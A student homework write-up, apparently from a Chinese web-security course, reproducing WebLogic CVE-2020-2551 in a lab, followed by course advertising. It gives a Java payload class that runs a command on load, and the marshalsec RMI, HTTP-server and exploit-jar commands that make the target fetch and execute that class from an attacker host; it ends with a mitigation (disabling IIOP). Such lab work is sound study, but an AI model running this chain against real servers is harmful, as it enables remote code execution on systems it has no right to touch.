文章来源｜MS08067 Web安全漏洞挖掘实战班课后作业

本文作者：某学员A（Web漏洞挖掘实战班1期学员）

写再最前

听了涛哥关于weblogic的课程讲解，收益颇多(前段时间实在太忙了~ ~)，看到班里很多同学都在无私的分享着自己的心得，自己也写一篇，希望能帮助到一起学习的同学。

漏洞说明

CVE-2020-2551并不是一个新的漏洞，它是weblogic诸多漏洞中的一个，漏洞爆出时间为2020年，但是它绝对是一个中招概率极高的漏洞，因为它和jdk的版本高低无关，和T3无关，甚至它和console控制台是否关闭都没有关，也就是说，就算你把console端口关闭了，只要你把程序部署在了weblogic的服务上，你就有可能中招。

所需工具

1.marshalsec.jar(GitHub网上下载)

2.weblogicCVE2020_2551.jar(GitHub网上下载)

3.exp.class(通过exp.java文件编译而成)

前两个文件请自行网上下载，最后一个文件提供一下个人实现的源码(可以弹出calc的)，更复杂的请自行编写

用记事本输入如下代码并且取名为exp.java(此处注意，文件名很重要，如果不懂代码逻辑，就不要改了，如果代码能力Ok，当我没说)

import java.io.IOException;
public class exp {          static{                    try {                              java.lang.Runtime.getRuntime().exec(new String[]{"cmd","/c","calc"});                    } catch (IOException e) {                              e.printStackTrace();                    }          }          public static void main(String[] args) {                             }}

编译的方法也很简单，cmd进入到目标路径，使用命令javacexp.java编译后，就可以得到exp.class文件

开始试验

首先，务必务必要确认一点，就是你和靶机的网络是通的，如果不是通的，那一切白搭，当年复现永恒之蓝的时候也是网络的问题（泪水太多不忍回忆）

你看，这就是网络不通的情况

这种情况就算你所有步骤都没问题，但就是不好使，你说你气不气。

确认网络通了之后，才可以进行到后面的阶段，如果你用的是虚拟机，那大概率是防火墙的事，测试的时候可以先关了(记得测试完成后再打开)。

环境说明

靶机是weblogic10.0.3.6版本，其它高的版本也同样受影响(默认开启IIOP协议的版本均会被攻击)

攻击端IP：192.168.199.1

靶机的IP：192.168.199.133

攻击分三步开始运行，所有的命令都是在攻击端运行的，

1.攻击端开启marshalsec.jar的RMI服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.199.1/#exp" 1099

2.尝试使用python模拟http服务，当然了，你也可以使用任意一个可以提供HTTP服务的软件(注意：此处需将exp.class挂载到同级文件夹。)

先进入到exp.class的同级目录

然后运行命令python -m http.server --bind 0.0.0.0 80

3.在攻击端使用weblogicCVE2020_2551.jar开始攻击尝试

java -jar weblogicCVE2020_2551.jar 192.168.199.133 7001 rmi://192.168.199.1:1099/exp

注意左侧，命令执行后左侧会出现新的内容，框选部分，证明现在已经在攻击了

被攻击端成功获取攻击端发送的恶意class文件，图中模拟的HTTP服务已经接收到客户端的请求了（两次）

同样的，观察marshalsec同样收到了靶机的请求，攻击成功

放一个靶机的攻击效果图，目标系统成功弹出了计算器(两次)。试验的时候杀毒软件没关，还是中招，攻击成功

神奇的是，就算你关了7001控制台，受管服务一样会被攻击。

一个小的提醒

你可能在执行第三步命令的时候窗口出现报错提示，这里不要担心

因为后台控制台这个时候同样也再报错，不过不影响攻击的效果(计算器已经弹出来了)

漏洞防护方法

1.进入控制台-环境-服务器-某某服务

2.依次点击协议-找到IIOP协议关闭IIOP并保存

3.清理缓存，重启即可

参考资料来源：搜索引擎以及Github

URL1：https://github.com/Y4er/CVE-2020-2551

URL2：https://y4er.com/post/weblogic-cve-2020-2551/

友情提醒：本文仅适用于安全技术交流，切不可用于非法用途，后果自负。

想学习更多WEB安全漏洞挖掘的技术，可加入

第2期  Web安全漏洞挖掘实战班

*大纲仅作为参考，会根据当期进度有所变化（加客服获取高清课程导图）

课程费用

每期班定价2999，开班价：1999（前30名送365元Web安全知识星球名额）

每个报名学员都可享受一次后续任意一期课免费重听权益，一次没学懂就再来一遍，后续培训可任选一期来听。请有意参加培训的学员抓紧报名！

凡是MS08067旗下任意星球学员或其他培训课程学员，可享内部价1899；

支持支付宝、信用卡、花呗分期，对公转账，可开发票！

第一期班学员作业（部分）

上课时间

开课时间11月13号，每周二天课，共8周21节课（42小时）
周四：19:30-21:30
周六：14:00-18:00
如果无法准时参加直播课程，在线培训的每节课程都会被录制成视频上传到学员区，可随时下载观看。

上课方式

培训采用在线直播+随堂录播+配套教材+配套星球+课后作业的形式，无需等待，报名后立即进入“Web安全”星球开始预习。
 

讲师介绍

讲师A：MS08067安全实验室核心成员，Web安全知识星球合伙人，安恒信息安全高级工程师，擅长企业安全研究、情报分析、渗透测试，安全开发。

讲师B：MS08067安全实验室核心成员，Web安全知识星球合伙人，擅长渗透测试、红队攻击、安全开发。

讲师C：MS08067安全实验室核心成员，资深安全培训讲师，擅长WEB渗透测试、内网渗透、密码学、安全管理、等保、法律法规等。

团队出品了国内经典WEB安全图书---《Web安全攻防-渗透测试实战指南》

如何提前预习

• 为更顺利的完成课程相关内容，请同学一定要提前预习相关知识点，已经报名的同学，请购买实验室出品《Web安全攻防：渗透测试实战指南》一书或在赠送的MS08067实验室“Web安全知识星球”中学习相关的内容。

  
  本次课程为WEB安全进阶提升课程，基础比较差的同学请务必提前一周预习“Web安全”知识星球内基础课程！

如果喜欢本文
欢迎 在看丨留言丨分享至朋友圈 三连